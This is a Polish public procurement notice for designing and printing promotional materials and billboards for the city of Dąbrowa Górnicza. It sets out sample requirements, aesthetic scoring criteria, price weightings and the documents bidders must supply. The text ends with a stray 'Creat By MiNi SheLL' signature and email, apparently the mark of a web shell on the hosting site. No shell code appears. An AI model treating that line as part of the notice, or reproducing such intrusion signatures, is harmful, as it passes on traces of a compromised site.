2. Każdy z Wykonawców ubiegających się o udzielenie zamówienia dostarczy po 1 egzemplarzu nw. rodzajów próbek o następujących  parametrach: 
Plakat:
Format  min.B2, Kolor 4+0, Papier offset min. 100 g

Ulotka : 
Format min A4 ,papier offset min. 150 g , Kolor - 4+4, 

Zaproszenie:
Format A4 dzielone  min. na 2, Kolor 4+4, Papier kreda - min. 250g, 

Kartka świąteczna:
 kolor 4+4, kreda min. 200g

3. Komisja przetargowa oceni przedłożone wraz z ofertą próbki biorąc pod uwagę następujące kategorie:
1. atrakcyjność i  oryginalność projektu - w tej kategorii w ocenie projektów będą brane pod uwagę ich zdolności do  wzbudzania zainteresowania, a także ich właściwości twórcze, tj. wyjątkowość, swoistość, niepowtarzalność;
2. czystość barw - w tej kategorii w ocenie próbek będą brane pod uwagę takie elementy jak: użyta gama barw, kontrastu miedzy zastosowanymi barwami, zawartości w zastosowanych barwach szarości;
3. jakość wykonania poligraficznego - w tej kategorii będą oceniane próbki pod względem solidności wykonania oraz konstrukcji, a także wytrzymałość próbek
4. ogólna estetyka - w tej kategorii będą oceniane próbki pod względem współgrania wszystkich elementów, które  je tworzą
5. wyrazistość przekazu - w tej kategorii będą oceniane próbki pod względem dostosowania projektu do określonego charakteru i tematyki (będzie oceniana czytelność, zrozumiałość oraz wymowność projektu).


Zadanie II 
Cena                                                    - 70 %
Kryterium niemierzalne - walory estetyczne - 30% 
1. Sposób punktacji w ramach kryterium walory estetyczne: na podstawie przedłożonych wraz z ofertą próbek materiału reklamowego na billboard, zgodnie z pkt 8.3.2. SIWZ. 
1 egzemplarz projektu billboardu, zapisany na płycie CD stanowiący kompletny projekt billboardu zrealizowany przez Wykonawcę (tematyka projektu dowolna). Projekt powinien być zapisany na płycie CD w pliku podglądowym  JPG 
w rozdzielczości 1600 x 960 pikseli.
2. Komisja przetargowa oceni przedłożoną wraz z ofertą próbkę biorąc pod uwagę następujące kategorie:
 1. atrakcyjność i  oryginalność projektu - w tej kategorii w ocenie projektów będą brane pod uwagę ich zdolności do  wzbudzania zainteresowania, a także ich właściwości twórcze, tj. wyjątkowość, swoistość, niepowtarzalność;
2. ogólna estetyka - w tej kategorii będą oceniane próbki pod względem współgrania wszystkich elementów, które  je tworzą;
3. wyrazistość przekazu - w tej kategorii będą oceniane próbki pod względem dostosowania projektu do określonego charakteru i tematyki (będzie oceniana czytelność, zrozumiałość oraz wymowność projektu).
6. Uszczegółowienie sekcji II.2), Załącznika I Część nr 1 pkt 3, Załącznika II Część nr 2 pkt 3: Rozpoczęcie realizacji zamówienia: od dnia podpisania umowy
Zakończenie realizacji zamówienia: do 31.12.2013 r. lub do wyczerpania środków budżetowych zabezpieczonych na ten cel.
7. Niezbędne informacje wynikające ze znowelizowanej ustawy Prawo Zamówień Publicznych i przepisów wykonawczych do ustawy:
7.1. W celu wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy Zamawiający żąda następujących dokumentów: 
7.1.1. oświadczenia, o spełnieniu wymagań określonych w art. 22 ust.1ustawy załącznik nr 3 do SIWZ (wskazana data podpisania);

7.1.2. wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;- załącznik nr 4/I i (-lub) załącznik nr 4/II do SIWZ (wskazana data podpisania)

Uwagi:
1. Dowodami o których mowa w pkt 9.1.2. są:
a) poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinny być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
b) oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w lit a Uwag.
2. W przypadku gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa w pkt 9.1.2. SIWZ, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w ust. 1 Uwag.
3. Wykonawca, w miejsce poświadczeń, o których mowa w pkt 1. lit a Uwag, może przedkładać dokumenty potwierdzające należyte wykonanie dostaw lub usług oraz wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie, określone w § 1 ust. 1 pkt 2 i 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).

7.1.3. wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami - załącznik nr 5/I i (-lub) załącznik nr 5/II do SIWZ (wskazana data podpisania)

7.1.4. wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami wraz oświadczeniem, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - załącznik nr 6 do SIWZ (wskazana data podpisania);

7.2. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy 
w okolicznościach, o których mowa w art. 24 ust. 1 ustawy, Zamawiający żąda od Wykonawcy następujących dokumentów: 

7.2.1. oświadczenia o braku podstaw do wykluczenia - załącznik nr 7 do SIWZ (wskazana data podpisania);

7.2.2. aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert 
7.3. W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda od Wykonawcy:
7.3.1. próbek, opisów lub fotografii produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Projekt i druk materiałów promocyjno -  informacyjnych miasta Dąbrowa Górnicza

I.  Wykonanie ulotek, plakatów, zaproszeń, informatorów, broszur,  dyplomów,  kalendarzy, pocztówek i kartek świątecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  I: Wykonanie ulotek, plakatów, zaproszeń, informatorów, broszur, dyplomów, kalendarzy, pocztówek i kartek świątecznych.
Zakres zamówienia znajduje się w sekcji II.1.3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 79.82.25.00-7, 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kryterium niemierzalne - walory estetyczne - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Projekt i druk materiałów promocyjno -  informacyjnych miasta Dąbrowa Górnicza
II. Wykonanie materiałów reklamowych na billboardy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie II:  Wykonanie materiałów reklamowych na billboardy
Zakres zamówienia znajduje się w sekcji II.1.3..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 79.82.25.00-7, 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Kryterium niemierzalne - walory estetyczne - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com